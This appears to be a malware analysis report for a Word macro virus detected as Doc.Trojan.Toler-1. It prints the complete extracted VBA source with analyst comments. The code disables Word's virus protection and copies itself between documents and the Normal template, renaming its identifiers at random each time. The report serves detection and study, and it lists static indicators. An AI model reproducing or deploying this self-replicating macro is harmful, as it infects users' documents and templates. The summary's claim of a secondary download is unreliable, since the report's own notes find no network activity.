MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open subroutine, which is a common technique for executing malicious code when a document is opened. The macro attempts to disable virus protection and obfuscates its code, suggesting an intent to download and execute a secondary payload. The ClamAV detection name 'Doc.Trojan.Toler-1' further supports its malicious nature.
Heuristics 3
-
ClamAV: Doc.Trojan.Toler-1 — critical — CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Trojan.Toler-1
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS — Document contains VBA macro code
-
Document_Open macro — high — OLE_VBA_DOCOPEN — Document_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3151 bytes |
| SHA-256: 3599b9ee00287aba1a66a34f3f26e52397361739a88e3a757f82c7048661b9c7 | | | |
| Detection — ClamAV: Doc.Trojan.Toler-1; Obfuscation or payload: unlikely | | | |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' --- Analyst notes ---
' The attributes above mark this as the ThisDocument class module of a Word
' document (VB_Base "1Normal.ThisDocument", VB_TemplateDerived = True).
' The next line is not a stray comment: OphxmZ (at the bottom of this module)
' locates the start of the viral body by comparing every module line against
' that exact text, so it is a self-location start marker. Its counterpart is
' the trailing comment on the module's final "End Function" line. Both exact
' strings are usable as static indicators for this family.
' Tolerance!
' Record describing where the viral body sits inside one code module.
' Produced by OphxmZ; consumed by Document_Open and YgxwZ.
Private Type GuogxZ
LldidxZ As Integer ' 1-based line number of the start-marker comment (0 = not found)
ChckkvZ As Integer ' line count from the start marker through the end marker, inclusive (0 = not found)
FbcZ As Boolean ' True when a line of the module begins with a Document_Open declaration
End Type
' Empty Document_Close handler. It does nothing; why it is present cannot be
' determined from this listing.
Private Sub Document_Close()
End Sub
' Entry point, run automatically by Word when the document is opened.
' What this listing shows it doing:
'   1. Turns off Word's macro virus warning (Options.VirusProtection = False).
'   2. Takes the first code module of the active document and of the Normal template.
'   3. Measures both with OphxmZ to learn which one carries the viral body.
'   4. Copies the body document -> Normal template when Normal has no body, and
'      Normal template -> document when the document has no body or the two
'      bodies differ in length (presumably to refresh a stale copy), then saves
'      the document over itself.
'   5. Otherwise, with probability 0.3, prepends a paragraph reading
'      "MUD Forever! :-)" and saves — the only user-visible payload here.
' NOTE(review): nothing in this extracted source opens a network connection or
' starts another process; the behaviour visible here is self-replication
' through the Normal template. Useful detection hooks: the VirusProtection
' write, the VBProject.VBComponents access (in current Office versions this is
' gated by the "Trust access to the VBA project object model" setting), and
' the SaveNormalPrompt write — none of which a benign document macro needs.
Private Sub Document_Open()
Randomize ' seed Rnd so generated identifiers and the 0.3 chance vary per run
Options.VirusProtection = False ' disable Word's built-in macro warning
Dim CjdrZ As Object, IqahxhZ As Object
Set CjdrZ = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule ' this document's module
Set IqahxhZ = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule ' Normal template's module
Dim VckedryZ As GuogxZ, KpwgZ As GuogxZ: VckedryZ = OphxmZ(CjdrZ): KpwgZ = OphxmZ(IqahxhZ) ' measure document, then Normal
If KpwgZ.ChckkvZ = 0 Then ' Normal template carries no body yet
YgxwZ CjdrZ, IqahxhZ, VckedryZ, KpwgZ ' document -> Normal
Options.SaveNormalPrompt = False ' suppress the "save changes to Normal?" prompt on exit
End If
If (VckedryZ.ChckkvZ = 0) Or ((KpwgZ.ChckkvZ <> 0) And (VckedryZ.ChckkvZ <> KpwgZ.ChckkvZ)) Then ' document clean, or both carry bodies of different length
YgxwZ IqahxhZ, CjdrZ, KpwgZ, VckedryZ ' Normal -> document
ActiveDocument.SaveAs (ActiveDocument.FullName) ' persist the modified document in place
ElseIf Rnd < 0.3 Then
ActiveDocument.Range(0, 0).InsertParagraphBefore
ActiveDocument.Range(0, 0).InsertBefore "MUD Forever! :-)" ' visible marker text at the top of the document
ActiveDocument.SaveAs (ActiveDocument.FullName)
End If
End Sub
' Copies the viral body from module LldidxZ (source) into module SxsZ (target),
' renaming every internal identifier on the way so each copy looks different.
'   LldidxZ / SxsZ : source / target CodeModule objects
'   FromP          : OphxmZ result for the source (start line and length of its body)
'   ToP            : OphxmZ result for the target (only its FbcZ flag is read here)
' The 19 strings in CtbrxkZ are the type, its fields, every routine and every
' local the body uses. Renaming is a plain substring rewrite (DwgyhZ) over the
' whole extracted text, so it also rewrites the quoted names inside this very
' Array(...) literal, which keeps the list consistent with the new names in the
' copy. Comments in the body are rewritten the same way.
' Detection note: because RhkcZ always appends "Z", every renamed identifier in
' a copy ends in "Z" — already visible throughout this sample.
Private Sub YgxwZ(LldidxZ As Object, SxsZ As Object, FromP As GuogxZ, ToP As GuogxZ)
Dim IewakhZ As String, CtbrxkZ
IewakhZ = LldidxZ.Lines(FromP.LldidxZ, FromP.ChckkvZ) ' read the marked region as one string
CtbrxkZ = Array("RhkcZ", "GuogxZ", "LldidxZ", "SxsZ", "XqlZ", "ChckkvZ", "FbcZ", "CjdrZ", "IqahxhZ", "VckedryZ", "KpwgZ", "YgxwZ", "IewakhZ", "CpwtaviZ", "UtleZ", "RcypZ", "OphxmZ", "DwgyhZ", "CtbrxkZ")
For I = 0 To 18: DwgyhZ IewakhZ, (CtbrxkZ(I)), RhkcZ(IewakhZ): Next I ' one fresh random name per identifier; RhkcZ checks the partially rewritten text
If ToP.FbcZ Then SxsZ.DeleteLines 1, SxsZ.CountOfLines ' target already has a Document_Open: wipe its whole module first
SxsZ.AddFromString IewakhZ ' append the rewritten body to the target
End Sub
' Builds a random identifier that does not yet occur anywhere in IewakhZ.
' Shape: an uppercase letter A-Y, then up to nine lowercase letters a-y (each
' of the ten slots is filled with probability about 0.5), then a literal "Z".
' Candidates shorter than 3 characters or already present in the text are
' thrown away and regenerated, so the loop runs until a fresh name is found.
' Detection note: the fixed trailing "Z" and the A-Y / a-y alphabet (Z is never
' drawn: Int(Rnd * 25 + 65) yields 65..89) form a stable naming fingerprint.
Private Function RhkcZ(IewakhZ As String) As String
Dim CpwtaviZ As String: CpwtaviZ = ""
While (InStr(IewakhZ, CpwtaviZ) <> 0) Or (Len(CpwtaviZ) < 3) ' retry while the candidate is in the text or too short
CpwtaviZ = ""
For I = 1 To 10
If Rnd > 0.5 Then ' each of the ten slots is optional
If Len(CpwtaviZ) = 0 Then
CpwtaviZ = CpwtaviZ + Chr(Int(Rnd * 25 + 65)) ' first character: uppercase A-Y
Else: CpwtaviZ = CpwtaviZ + Chr(Int(Rnd * 25 + 97)) ' later characters: lowercase a-y
End If
End If
Next I
CpwtaviZ = CpwtaviZ + "Z" ' every generated name ends in Z
Wend
RhkcZ = CpwtaviZ
End Function
' Replace-all: every occurrence of UtleZ inside IewakhZ is replaced with RcypZ.
' IewakhZ is passed by reference (VBA's default), so the caller's string is
' modified in place. The scan restarts at the match position rather than past
' the inserted text, so it would loop forever if RcypZ contained UtleZ; the
' name shape RhkcZ produces appears to rule that out, but this routine does not
' check it. `Index` is never declared or read anywhere in this listing, so the
' increment on it is dead code that only compiles because the module has no
' Option Explicit.
Private Sub DwgyhZ(IewakhZ As String, UtleZ As String, RcypZ As String)
Dim I As Long
I = 1
While InStr(I, IewakhZ, UtleZ) <> 0 ' any occurrence at or after position I?
I = InStr(I, IewakhZ, UtleZ)
IewakhZ = Left(IewakhZ, I - 1) + RcypZ + Mid$(IewakhZ, I + Len(UtleZ)) ' splice the replacement in
Index = Index + 1 ' dead: implicitly declared, never read
Wend
End Sub
' Scans code module XqlZ line by line and returns a GuogxZ describing the
' viral body found in it:
'   LldidxZ = line number of the start-marker comment (0 if absent)
'   ChckkvZ = line count from that marker through the end-marker line,
'             inclusive (0 if the end marker is absent)
'   FbcZ    = True if some line begins with a Document_Open declaration
' The two marker tests are exact whole-line comparisons, so any change to those
' lines breaks self-location. The trailing comment on this function's own
' "End Function" line is the end marker; it is part of the sample, not an
' annotation.
Private Function OphxmZ(XqlZ As Object) As GuogxZ
OphxmZ.LldidxZ = 0
OphxmZ.ChckkvZ = 0
OphxmZ.FbcZ = False
For I = 1 To XqlZ.CountOfLines
If XqlZ.Lines(I, 1) = "' Tolerance!" Then OphxmZ.LldidxZ = I ' start marker found
If XqlZ.Lines(I, 1) = "End Function 'Tolerance!" Then OphxmZ.ChckkvZ = I - OphxmZ.LldidxZ + 1 ' end marker: inclusive length
If InStr(XqlZ.Lines(I, 1), "Private Sub Document_Open()") = 1 Then OphxmZ.FbcZ = True ' module already carries a Document_Open
Next I
End Function 'Tolerance!
|
|||